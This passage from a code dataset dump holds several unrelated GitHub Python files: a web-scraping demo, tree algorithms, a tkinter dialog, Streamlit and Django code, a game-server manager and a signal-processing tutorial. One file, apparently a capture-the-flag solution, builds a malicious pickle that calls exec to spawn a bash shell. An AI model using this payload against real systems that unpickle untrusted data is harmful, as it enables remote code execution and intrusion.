'x'.join(str(x) for x in shape)\n\n\ndef get_key(key_name: str) -> str:\n try:\n return os.environ[key_name]\n except KeyError:\n raise KeyError(f'Environment variable {key_name} is not set') from None\n\n\ndef format_prompt(X: str, prompt: str, context: t.Optional[t.List[str]] = None) -> str:\n if '{context}' in prompt:\n if context:\n return prompt.format(context='\\n'.join(context)) + X\n else:\n raise ValueError(f'A context is required for prompt {prompt}')\n else:\n return prompt + X\n","repo_name":"SuperDuperDB/superduperdb","sub_path":"superduperdb/ext/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":377,"dataset":"github-code","pt":"78"} +{"seq_id":"30167044769","text":"#urllib basics\nimport urllib.request\n# #urlretrieve(url, local save path) downloads a web page straight to local disk\n#\n# # urllib.request.urlretrieve(\"http://www.baidu.com\",\"D:\\\\lianxi\\\\dld.html\")\n# # urllib.request.urlcleanup()\n#view the response's summary info with info(); build the Request (with headers) first, then open it\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nreq = urllib.request.Request(\"https://read.douban.com/provider/all\", headers=headers)\nfile = urllib.request.urlopen(req)\nprint(file.info())\n\n\n\n\n\nfrom urllib.request import urlopen, Request\n\nurl = \"https://read.douban.com/provider/all\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nret = Request(url, headers=headers)\nres = urlopen(ret)\naa = res.read().decode('utf-8')\nprint(aa)\n\n\n\n\n","repo_name":"Carmans/py_study","sub_path":"dataSpide/spidy_test.py","file_name":"spidy_test.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4100118880","text":"#!/usr/bin/python -t\n\n# dfs\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @return: the length of the longest consecutive sequence path\n \"\"\"\n def longestConsecutive2(self, root):\n # write your code here\n if not root:\n return 0\n \n ret, _, _ = self.dfs(root)\n \n return ret\n \n def dfs(self, node):\n if node == None:\n return 0, 0, 0\n \n \n \n left, left_down, left_up = 
self.dfs(node.left)\n right, right_down, right_up = self.dfs(node.right)\n \n down, up = 0, 0\n \n if node.left and node.left.val + 1 == node.val:\n down = max(down, left_down+1)\n if node.left and node.left.val - 1 == node.val:\n up = max(up, left_up+1)\n if node.right and node.right.val + 1 == node.val:\n down = max(down, right_down+1)\n if node.right and node.right.val - 1 == node.val:\n up = max(up, right_up+1)\n \n ret = down + 1 + up\n ret = max(ret, left, right)\n \n return ret, down, up\n \n \n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0614_binary_tree_longest_consecutive_sequence_II.py","file_name":"0614_binary_tree_longest_consecutive_sequence_II.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42776481574","text":"# This is a re-purposed copy of 01_help_gui_v5\n\nfrom tkinter import *\nfrom functools import partial # To prevent unwanted windows\n\n\nclass Converter:\n def __init__(self, parent):\n # Formatting variables\n background_colour = \"#F5F6FF\" # pale blue\n\n # Converter Main Screen GUI\n self.converter_frame = Frame(width=300, height=300,\n bg=background_colour, pady=10)\n self.converter_frame.grid()\n\n # Temperature Conversion Heading (row 0)\n self.temp_converter_label = Label(self.converter_frame,\n text=\"Temperature Converter\",\n font=(\"Helvetica\", \"16\", \"bold\"),\n bg=background_colour,\n padx=10, pady=10)\n self.temp_converter_label.grid(row=0)\n\n # Export button (row 1)\n self.export_button = Button(self.converter_frame, text=\"Export\",\n font=(\"Helvetica\", \"14\"), bg=\"#97BAE8\", # dark blue\n padx=5, pady=1, command=self.export)\n self.export_button.grid(row=1)\n\n def export(self):\n get_export = Export(self)\n\n\nclass Export:\n def __init__(self, partner):\n background = \"#DAE8FC\" # light blue\n\n # disable export button\n partner.export_button.config(state=DISABLED)\n\n # sets up child window (ie: export box)\n self.export_box = Toplevel()\n\n # if users press cross at top, closes export and 'releases' export button\n self.export_box.protocol('WM_DELETE_WINDOW', partial(self.close_export,\n partner))\n\n # set up GUI Frame\n self.export_frame = Frame(self.export_box, width=300, bg=background)\n self.export_frame.grid()\n\n # set up export heading (row 0)\n self.export_heading = Label(self.export_frame,\n text=\"Export Instructions\",\n font=\"helvetica 14 bold\", bg=background)\n self.export_heading.grid(row=0)\n\n # export text (label, row 1)\n self.export_text = Label(self.export_frame,\n text=\"Enter a filename in the box below and \"\n \"press the Save button to save your \"\n \"calculation history to a text file.\",\n font=\"helvetica 10 italic\", justify=LEFT,\n width=40, bg=background, wrap=250)\n self.export_text.grid(row=1)\n\n # Warning text (label, row 2)\n self.export_text = Label(self.export_frame,\n text=\"If the filename you enter below already\"\n \" exists, it's contents will be replaced\"\n \" with your calculation history.\",\n font=\"helvetica 10 bold\", justify=LEFT,\n fg=\"#FA6800\", # text is orange\n width=40, bg=\"#FADAC8\", # background is pale orange\n wrap=250, padx=10, pady=10)\n self.export_text.grid(row=2)\n\n # Filename Entry box (row 3)\n self.filename_entry = Entry(self.export_frame, width=20,\n font=\"helvetica 14\", justify=CENTER)\n self.filename_entry.grid(row=3, pady=10)\n\n # Save / Cancel frame (row 4)\n self.save_cancel_frame = Frame(self.export_frame)\n 
self.save_cancel_frame.grid(row=4, pady=10)\n\n # Save and Cancel button\n self.save_button = Button(self.save_cancel_frame, text=\"Save\",\n font=\"helvetica 14\", bg=\"#97BAE8\")\n self.save_button.grid(row=0, column=0)\n\n self.cancel_button = Button(self.save_cancel_frame, text=\"Cancel\",\n font=\"helvetica 14\", bg=\"#F5F6FF\",\n command=partial(self.close_export,\n partner))\n self.cancel_button.grid(row=0, column=1)\n\n def close_export(self, partner):\n # put export button back to normal...\n partner.export_button.config(state=NORMAL)\n self.export_box.destroy()\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter Calculator\")\n something = Converter(root)\n root.mainloop()\n","repo_name":"ummmh/Exercises","sub_path":"Temperature Converter Task/temperature_converter_task/11_export_gui_v1.py","file_name":"11_export_gui_v1.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9860452533","text":"from base64 import *\n\n\ndef to_binbytes(b: bytes):\n return b\"\\x8e\" + len(b).to_bytes(8, \"little\") + b\n\n\npkl_getattr = (\n b\"\\x80\\x04c__main__\\naaaa\\n0c__main__\\nbbbb\\n0c__main__\\n__builtins__.getattr\\n.\"\n)\npkl_builtins = b\"\\x80\\x04c__main__\\naaaa\\n0c__main__\\nbbbb\\n0c__main__\\n__builtins__\\n.\"\npkl = (\n b\"\\x80\\x04c__main__\\nfleg\\n0c__main__\\nflog\\n0c__main__\\nNotAPickle\\n222\"\n + to_binbytes(pkl_getattr)\n + b\"\\x85R)R\"\n + b\"p0\\n0\" # memo[0] = getattr, pop\n + to_binbytes(pkl_builtins)\n + b\"\\x85R)R\"\n + b\"p1\\n0\" # memo[1] = builtins, pop\n + b\"g0\\n\"\n + b\"g1\\n\"\n + b\"Vexec\\n\"\n + b\"\\x86R\"\n + to_binbytes(b'import os;os.system(\"bash\")')\n + b\"\\x85R\"\n + b\".\"\n)\n\n\nprint(b64encode(pkl))\n","repo_name":"maple3142/imaginaryCTF-solution","sub_path":"2021-08/frikle_pickles/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"27252055799","text":"import pandas as pd\nimport streamlit as st\nfrom data_explorer.domain.entities import Section\nfrom src.data import Dataset\nfrom src.settings import ParamsSections\nfrom src.text import TextColumn\n\n\nclass TextSection(Section):\n \"\"\"\n Class that stores the content of the text section.\n\n Attributes\n ----------\n dataset : DataSet\n Dataset object with the transformed dataframe.\n params: ParamsSections\n Object with the parameters for the datetime section.\n header : str, default = \"3. Text Column Information\"\n Section header.\n \"\"\"\n\n def __init__(\n self,\n dataset: Dataset,\n params: ParamsSections,\n header: str = \"3. 
Text Column Information\",\n ):\n self._name = \"Text\"\n self._header = header\n self._params = params\n self._dataset = dataset\n\n def render(self) -> None:\n \"\"\"Render the text section.\"\"\"\n\n # Header\n st.header(self._header)\n\n for n, col in enumerate(self._dataset.get_text_columns()):\n text_col = TextColumn(col, self._dataset.df[col])\n\n # Subheader\n st.subheader(f\"3.{n} Field Name: *{text_col.get_name()}*\")\n\n # Display table with metrics\n st.dataframe(\n pd.Series(\n {\n \"Number of Unique Values\": text_col.get_unique(\n self._params.DROP_NA\n ),\n \"Number of Rows with Missing Values\": text_col.get_missing(),\n \"Number of Empty Rows\": text_col.get_empty(),\n \"Number of Rows with Only Whitespace\": text_col.get_whitespace(),\n \"Number of Rows with Only Lowercases\": text_col.get_lowercase(),\n \"Number of Rows with Only Uppercases\": text_col.get_uppercase(),\n \"Number of Rows with Only Alphabet\": text_col.get_alphabet(),\n \"Number of Rows with only Digits\": text_col.get_digit(),\n \"Mode Value\": text_col.get_mode(self._params.DROP_NA),\n },\n name=\"value\",\n )\n )\n\n # Display the Bar chart\n st.plotly_chart(\n text_col.get_barchart(self._params.PLOT, self._params.DROP_NA)\n )\n\n # Display most frequent values\n st.write(\"**Most Frequent Values**\")\n st.dataframe(\n text_col.get_frequent(self._params.TOP_FREQUENCY, self._params.DROP_NA)\n )\n\n # Add a horizontal rule\n st.markdown(\"---\")\n","repo_name":"AnaMJaimeR/data_explorer_webapp","sub_path":"data_explorer/domain/sections/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10515416554","text":"\nfrom django.urls import path\nfrom . 
import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView\n)\nurlpatterns = [\n path('movies/', views.MovieApi.as_view(), name='movies'),\n path('filterMovies/', views.FilterMovieApi.as_view(), name='filterMovies'),\n path('events/', views.EventApi.as_view(), name='events'),\n path('filterEvents/', views.FilterEventApi.as_view(), name='filterEvents'),\n path('sports/', views.SportApi.as_view(), name='sports'),\n path('filterSports/', views.FilterSportApi.as_view(), name='filterSports'),\n path('activities/', views.ActivityApi.as_view(), name='activities'),\n path('filterActivities/', views.FilterActivityApi.as_view(), name='filterActivities'),\n path('search/', views.SearchApi.as_view(), name='search'),\n path('login/', views.LoginUser.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('token/verify/',TokenVerifyView.as_view(),name=\"verify_token\"),\n path('register/',views.RegisterUser.as_view(),name=\"registerUser\")\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"ridam9795/ExploreShow","sub_path":"rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74584852091","text":"import subprocess\nimport psutil\nimport asyncio\nimport os\n\nfrom cogs.handlers.data_handler import get_cowmaster_configuration, ConfigManagement\nfrom cogs.misc.logger import get_logger, get_misc\nfrom cogs.handlers.events import stop_event\nfrom cogs.TCP.packet_parser import GameManagerParser\n\nLOGGER = get_logger()\nMISC = get_misc()\n\nclass CowMaster:\n def __init__(self, port, global_config):\n self.port = port\n self.id = 0\n self.name = f\"{global_config['hon_data']['svr_name']}-cowmaster\"\n self.global_config = global_config\n self.enabled = False\n self.set_configuration()\n\n self.client_connection = None\n self.cowmaster_cmdline = get_cowmaster_configuration(self.global_config.get(\"hon_data\"))\n\n self.game_manager_parser = GameManagerParser(self.id, logger = LOGGER)\n \n # state variables\n self._started = None\n self._pid = None\n self._proc_hook = None\n self.status_received = asyncio.Event()\n\n self.game_state = CowState(self.id, self.config.local)\n self.reset_cowmaster_state()\n self.game_state.add_listener(self.on_game_state_change)\n\n asyncio.create_task(self.monitor_process())\n \n async def fork_new_server(self, game_server):\n if not self.client_connection:\n LOGGER.warn(\"CowMaster - Not yet established connection to manager.\")\n return\n await self.client_connection.send_packet(game_server.get_fork_bytes(), send_len=True)\n\n def set_configuration(self):\n self.config = ConfigManagement(self.id,self.global_config)\n\n async def start_cow_master(self):\n \"\"\"\n Linux only feature, the cow master is used to preload resources for each available map type.\n The cow master can then be commanded to \"fork\" new game servers, off existing resources and RAM.\n This results in instant server startup times and some significantly less RAM usage overall \n \"\"\"\n cmdline_args = MISC.build_commandline_args(self.cowmaster_cmdline, self.global_config, cowmaster = True)\n exe = subprocess.Popen(cmdline_args,close_fds=True,start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n self._pid = 
exe.pid\n self._proc_hook = psutil.Process(pid=self._pid)\n self.enabled = True\n\n def stop_cow_master(self, disable=True):\n if self._proc_hook:\n self._proc_hook.terminate()\n self.enabled = disable\n self._pid = None\n self._proc_hook = None\n self.unset_client_connection()\n \n async def set_client_connection(self, client_connection):\n LOGGER.highlight(\"CowMaster - Connected to manager.\")\n self.client_connection = client_connection\n self._proc_hook = MISC.get_client_pid_by_tcp_source_port(self.global_config['hon_data']['svr_managerPort'], client_connection.addr[1])\n self._pid = self._proc_hook.pid\n \n def unset_client_connection(self):\n self.client_connection = None\n self._pid = None\n self._proc_hook = None\n\n async def on_game_state_change(self, key, value):\n # do things\n pass\n\n def get_port(self):\n return self.port\n \n def reset_cowmaster_state(self):\n LOGGER.debug(f\"CowMaster - Reset state\")\n self.status_received.clear()\n self.game_state.clear()\n \n async def monitor_process(self):\n LOGGER.debug(f\"CowMaster - Process monitor started\")\n try:\n while not stop_event.is_set():\n if self._proc_hook is not None:\n try:\n status = self._proc_hook.status() # Get the status of the process\n except psutil.NoSuchProcess:\n status = 'stopped'\n if status in ['zombie', 'stopped'] and self.enabled: # If the process is defunct or stopped. a \"suspended\" process will also show as stopped on windows.\n LOGGER.warn(f\"CowMaster stopped unexpectedly\")\n self._proc_hook = None # Reset the process hook reference\n self._pid = None\n self._proc_owner = None\n self.reset_cowmaster_state()\n # the below intentionally does not use self.schedule_task. The manager ends up creating the task.\n await self.start_cow_master()\n elif status != 'zombie' and not self.enabled:\n # Schedule a shutdown, otherwise if shutdown is already scheduled, skip over\n self.stop_cow_master()\n\n for _ in range(5): # Monitor process every 5 seconds\n if stop_event.is_set():\n break\n await asyncio.sleep(1)\n\n except asyncio.CancelledError:\n LOGGER.debug(f\"GameServer #{self.id} Process monitor cancelled\")\n # Propagate the cancellation\n raise\n except Exception as e:\n LOGGER.error(f\"GameServer #{self.id} Unexpected error in monitor_process: {e}\")\n\nclass CowState:\n def __init__(self, id, local_config):\n self._state = {}\n self._performance = {}\n self._listeners = []\n self.id = id\n self.local_config = local_config\n\n def __getitem__(self, key, dict_to_check=\"state\"):\n target_dict = self._state if dict_to_check == \"state\" else self._performance\n return target_dict[key]\n\n def __setitem__(self, key, value, dict_to_check=\"state\"):\n if dict_to_check == \"state\":\n self._state[key] = value\n else:\n self._performance[key] = value\n self._emit_event(key, value)\n\n def get_full_key(self, key, current_level, level=None, path=None, dict_to_check=\"state\"):\n if level is None:\n level = self._state if dict_to_check == \"state\" else self._performance\n\n if path is None:\n path = []\n\n if level is current_level:\n path.append(key)\n return \".\".join(path)\n\n for k, v in level.items():\n if isinstance(v, dict):\n new_path = path.copy()\n new_path.append(k)\n result = self.get_full_key(key, current_level, v, new_path, dict_to_check)\n if result:\n return result\n\n return None\n\n def update(self, data, current_level=None, dict_to_check=\"state\"):\n monitored_keys = [\"match_started\", \"match_info.mode\", \"game_phase\"]\n\n if current_level is None:\n current_level = self._state if 
dict_to_check == \"state\" else self._performance\n\n        target_dict = self._state if dict_to_check == \"state\" else self._performance\n\n        for key, value in data.items():\n            if isinstance(value, dict):\n                if key not in current_level:\n                    current_level[key] = {}\n                self.update(value, current_level[key], dict_to_check)\n            else:\n                full_key = self.get_full_key(key, current_level, dict_to_check=dict_to_check)\n                if full_key in monitored_keys and (full_key not in target_dict or self.__getitem__(full_key, dict_to_check) != value):\n                    self.__setitem__(full_key, value, dict_to_check)\n                else:\n                    current_level[key] = value\n\n    def add_listener(self, callback):\n        self._listeners.append(callback)\n\n    def _emit_event(self, key, value):\n        for listener in self._listeners:\n            asyncio.create_task(listener(key, value))\n\n    def clear(self, dict_to_check=None):\n        if dict_to_check is None or dict_to_check == \"state\":\n            self.update({\n                'instance_id':self.id,\n                'instance_name': self.local_config['name'],\n                'local_game_port': self.local_config['params']['svr_port'],\n                'remote_game_port': self.local_config['params']['svr_proxyPort'],\n                'local_voice_port': self.local_config['params']['svr_proxyLocalVoicePort'],\n                'remote_voice_port': self.local_config['params']['svr_proxyRemoteVoicePort'],\n                'proxy_enabled': self.local_config['params']['man_enableProxy'],\n                'status': None,\n                'uptime': None,\n                'num_clients': None,\n                'match_started': None,\n                'game_phase': None,\n                'current_match_id': None,\n                'players': [],\n                'match_info':{\n                    'map':None,\n                    'mode':None,\n                    'name':None,\n                    'match_id':None,\n                    'start_time': 0,\n                    'duration':0\n                }\n            }, dict_to_check=\"state\")\n        if dict_to_check is None or dict_to_check == \"performance\":\n            self.update({\n                \"now_ingame_skipped_frames\": 0,\n                \"total_ingame_skipped_frames\": 0,\n                'skipped_frames_detailed': {}\n            }, dict_to_check=\"performance\")","repo_name":"HoNfigurator/HoNfigurator-Central","sub_path":"cogs/game/cow_master.py","file_name":"cow_master.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"}
{"seq_id":"27818747275","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Signal Processing Basics\n# *Written by Luke Chang*\n# \n# In this lab, we will cover the basics of convolution, sine waves, and fourier transforms. This lab is largely based on exercises from Mike X Cohen's excellent book, [Analyzing Neural Time Series Data: Theory and Practice](https://www.amazon.com/Analyzing-Neural-Time-Data-Practice/dp/0262019876). If you are interested in learning in more detail about the basics of EEG and time-series analyses, I highly recommend his accessible introduction. I also encourage you to watch his accompanying freely available [*lecturelets*](https://www.youtube.com/channel/UCUR_LsXk7IYyueSnXcNextQ) to learn more about each topic introduced in this notebook.\n\n# ## Time Domain\n# \n# First we will work on signals in the time domain. This requires measuring a signal at a constant interval over time. The frequency with which we measure a signal is referred to as the sampling frequency. The units of this are typically described in $Hz$ - or the number of cycles per second. It is critical that the sampling frequency is consistent over the entire measurement of the time series.\n\n# ### Dot Product\n# To understand convolution, we first need to familiarize ourselves with the dot product. The dot product is simply the sum of the elements of a vector weighted by the elements of another vector. 
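For example (a small worked check, added here), the dot product of $[1, 2, 3]$ and $[4, 5, 6]$ is $1 \cdot 4 + 2 \cdot 5 + 3 \cdot 6 = 32$. 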
This method is commonly used in signal processing, and also in statistics as a measure of similarity between two vectors. Finally, there is also a geometric interpretation which is a mapping between vectors (i.e., the product of the magnitudes of the two vectors scaled by the cosine of the angle between them). For a more in depth overview of the dot product and its relation to convolution, you can watch this optional [video](https://youtu.be/rea6M1oagmA).\n# \n# $dotproduct_{ab}=\sum\limits_{i=1}^n a_i b_i$\n# \n# Let's create some vectors of random numbers and see how the dot product works. First, the two vectors need to be of the same length.\n\n# In[9]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.random.randint(1,10,20)\nb = np.random.randint(1,10,20)\n\nplt.scatter(a,b)\nplt.ylabel('B', fontsize=18)\nplt.xlabel('A', fontsize=18)\nplt.title('Scatterplot', fontsize=18)\n\nprint('Dot Product: %s' % np.dot(a,b))\n\n\n# What happens when we make the two variables more similar? In the next example we add gaussian noise on top of one of the vectors. What happens to the dot product?\n\n# In[10]:\n\n\nb = a + np.random.randn(20)\nplt.scatter(a,b)\nplt.ylabel('B', fontsize=18)\nplt.xlabel('A', fontsize=18)\nplt.title('Scatterplot', fontsize=18)\n\nprint(f'Dot Product: {np.dot(a,b)}')\n\n\n# ### Convolution\n# Convolution in the time domain is an extension of the dot product in which the dot product is computed iteratively over time. One way to think about it is that one signal weights each time point of the other signal and then slides forward over time. Let's call the timeseries variable *signal* and the other vector the *kernel*. Importantly, for our purposes, the kernel will almost always be smaller than the signal, otherwise we would only have one scalar value afterwards.\n# \n# To gain an intuition of how convolution works, let's play with some data. First, let's create a time series of spikes. Then let's convolve this signal with a boxcar kernel.\n\n# In[11]:\n\n\nn_samples = 100\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0, n_samples, 5)] = 1\n\nkernel = np.zeros(10)\nkernel[2:8] = 1\n\nf,a = plt.subplots(ncols=2, figsize=(20,5))\na[0].plot(signal, linewidth=2)\na[0].set_xlabel('Time', fontsize=18)\na[0].set_ylabel('Signal Intensity', fontsize=18)\na[0].set_title('Signal ', fontsize=18)\na[1].plot(kernel, linewidth=2, color='red')\na[1].set_xlabel('Time', fontsize=18)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_title('Kernel ', fontsize=18)\n\n\n# Notice how the kernel is only 10 samples long and the boxcar width is about 6 seconds, while the signal is 100 samples long with 5 single pulses.\n# \n# Now let's convolve the signal with the kernel by taking the dot product of the kernel with each time point of the signal. 
This can be illustrated by creating a matrix of the kernel shifted each time point of the signal.\n# \n# Using a heatmap, where the change in color reflects the intensity, we will illustrate that this is simply moving the boxcar kernel, which is 6 seconds in duration, forward in time for each sample.\n\n# In[12]:\n\n\nshifted_kernel = np.zeros((n_samples, n_samples+len(kernel) - 1))\nfor i in range(n_samples):\n    shifted_kernel[i, i:i+len(kernel)] = kernel\n\nplt.figure(figsize=(8, 8))\nplt.imshow(shifted_kernel, cmap='Reds')\nplt.xlabel('Time', fontsize=18)\nplt.ylabel('Time', fontsize=18)\nplt.title('Time Shifted Kernels', fontsize=18)\n\n\n# Now, let's take the dot product of the signal with this matrix. \n# \n# To refresh your memory from basic linear algebra: matrix multiplication consists of taking the dot product of the signal vector with each row of this expanded kernel matrix. \n\n# In[13]:\n\n\nconvolved_signal = np.dot(signal, shifted_kernel)\n\nplt.figure(figsize=(12, 5))\nplt.plot(convolved_signal, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Signal convolved with boxcar kernel', fontsize=18)\n\n\n# You can see that after convolution, each spike has now become the shape of the kernel. Spikes that were closer in time compound if the boxes overlap.\n# \n# Notice also how the shape of the final signal is the length of the combined signal and kernel minus one.\n\n# In[14]:\n\n\nprint(f\"Signal Length: {len(signal)}\")\nprint(f\"Kernel Length: {len(kernel)}\")\nprint(f\"Convolved Signal Length: {len(convolved_signal)}\")\n\n\n# This process of iteratively taking the dot product of the kernel with each timepoint of the signal and summing all of the values can be performed by using the convolution function from numpy, `np.convolve`.\n\n# In[15]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(np.convolve(signal, kernel), linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Signal convolved with boxcar kernel', fontsize=18)\n\n\n# What happens if the spikes have different intensities, reflected by different heights?\n\n# In[16]:\n\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0,n_samples,5)] = np.random.randint(1,5,5)\n\nf,a = plt.subplots(nrows=2, figsize=(18,6), sharex=True)\na[0].plot(signal, linewidth=2)\na[0].set_ylabel('Intensity', fontsize=18)\na[0].set_title('Timeseries of spikes with varying intensities', fontsize=18)\na[1].plot(np.convolve(signal, kernel), linewidth=2)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_title('Signal convolved with boxcar kernel', fontsize=18)\na[1].set_xlabel('Time', fontsize=18)\n\n\n# Now what happens if we switch out the boxcar kernel for something with a more interesting shape, say a hemodynamic response function? \n# \n# Here we will use a double gamma hemodynamic function (HRF) developed by Gary Glover. \n# \n# **Note**: If you haven't installed nltools yet, run `!pip install nltools`. You may need to restart your Jupyter kernel as well.\n\n# In[17]:\n\n\nfrom nltools.external import glover_hrf\n\ntr = 2\nhrf = glover_hrf(tr, oversampling=20)\nplt.plot(hrf, linewidth=2, color='red')\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Hemodynamic Response Function', fontsize=18)\n\n\n# For this example, we oversampled the function to make it smoother. In practice we will want to make sure that the kernel is the correct shape given our sampling resolution. Be sure to set the oversampling to 1. 
Notice how the function looks more jagged now?\n\n# In[18]:\n\n\nhrf = glover_hrf(tr, oversampling=1)\nplt.plot(hrf, linewidth=2, color='red')\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Hemodynamic Response Function', fontsize=18)\n\n\n# Now let's try convolving our event pulses with this HRF kernel.\n\n# In[19]:\n\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0,n_samples,5)] = np.random.randint(1,5,5)\n\nf,a = plt.subplots(nrows=2, figsize=(18,6), sharex=True)\na[0].plot(signal, linewidth=2)\na[1].plot(np.convolve(signal, hrf), linewidth=2)\na[0].set_ylabel('Intensity', fontsize=18)\na[0].set_title('Timeseries of spikes with varying intensities', fontsize=18)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_xlabel('Time', fontsize=18)\na[1].set_title('Signal convolved with HRF kernel', fontsize=18)\n\n\n# If you are interested in a more detailed overview of convolution in the time domain, I encourage you to watch this [video](https://youtu.be/9Hk-RAIzOaw) by Mike X Cohen. For more details about convolution and the HRF function, see this [overview](https://practical-neuroimaging.github.io/on_convolution.html) using python examples. \n\n# ### Oscillations\n# \n# Ok, now let's move on to studying time-varying signals that have the shape of oscillating waves.\n# \n# Let's watch a short video by Mike X Cohen to get some more background on sine waves. Don't worry too much about the matlab code as we will work through similar Python examples in this notebook.\n\n# In[12]:\n\n\nfrom IPython.display import YouTubeVideo\n\nYouTubeVideo('9RvZXZ46FRQ')\n\n\n# Oscillations can be described mathematically as:\n# \n# $A\\sin(2 \\pi ft + \\theta)$\n# \n# where $f$ is the frequency or the speed of the oscillation described in the number of cycles per second - $Hz$. Amplitude $A$ refers to the height of the waves, which is half the distance of the peak to the trough. Finally, $\\theta$ describes the phase angle offset, which is in radians.\n# \n# Here we will plot a simple sine wave. Try playing with the different parameters (i.e., amplitude, frequency, & theta) to gain an intuition of how they each impact the shape of the wave.\n\n# In[20]:\n\n\nfrom numpy import sin, pi, arange\n\nsampling_freq = 500\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq)\namplitude = 5\nfreq = 5\ntheta = 0\n\nsimulation = amplitude * sin(2 * pi * freq * time + theta)\n\nplt.figure(figsize=(12, 5))\nplt.plot(time, simulation, linewidth=2)\nplt.title('Sine Wave', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\n\n\n# We can also see the impact of different parameters using interactive widgets. Here you can move the sliders to see the impact of varying the amplitude, frequency, and theta parameter on a sine wave. 
We also show the complex components of the sine wave in the right panel.\n\n# In[21]:\n\n\nfrom ipywidgets import interact, FloatSlider\nfrom numpy import sin, pi, arange, real, imag\n\ndef plot_oscillation(amplitude=5, frequency=5, theta=1):\n    sampling_frequency=500\n    time = arange(-1, 1 + 1/sampling_frequency, 1/sampling_frequency)\n    simulation = amplitude * sin(2 * pi * frequency * time + theta)\n    z = np.exp(1j*(2 * pi * frequency * time + theta))\n\n    fig = plt.figure(figsize=(20, 4))\n    gs = plt.GridSpec(1, 6, left=0.05, right=0.48, wspace=0.05)\n    ax1 = fig.add_subplot(gs[0, :4])\n    ax1.plot(time, simulation, linewidth=2)\n    ax1.set_ylabel('Amplitude', fontsize=18)\n    ax1.set_xlabel('Time', fontsize=18)\n    ax2 = fig.add_subplot(gs[0, 5:], polar=True)\n    ax2.plot(real(simulation), imag(simulation))\n    plt.tight_layout()\n\ninteract(plot_oscillation, amplitude=FloatSlider(value=5, min=0, max=10, step=0.5),\n         frequency=FloatSlider(value=5, min=0, max=10, step=0.5), \n         theta=FloatSlider(value=0, min=-5, max=5, step=0.5))\n\n\n# Next we will generate a simulation combining multiple sine waves oscillating at different frequencies. \n\n# In[22]:\n\n\nsampling_freq = 500\n\nfreq = [3, 10, 5, 15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n    sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nf,a = plt.subplots(nrows=5, ncols=1, figsize=(12,5), sharex=True)\nfor i,x in enumerate(freq):\n    a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title(\"Sine waves oscillating at different frequencies\", fontsize=18)\na[i].set_xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\n# Let's add all of those signals together to get a more complex signal.\n\n# In[23]:\n\n\nplt.figure(figsize=(12,3))\nplt.plot(np.sum(sine_waves, axis=0), linewidth=2)\nplt.title(\"Sum of all of the sine waves\", fontsize=18)\nplt.xlabel(\"Time\", fontsize=18)\nplt.tight_layout()\n\n\n# What is the effect of changing the sampling frequency on our ability to measure these oscillations? Try dropping it to be very low (e.g., less than 70 Hz). Notice that signals will alias when the sampling frequency is below the 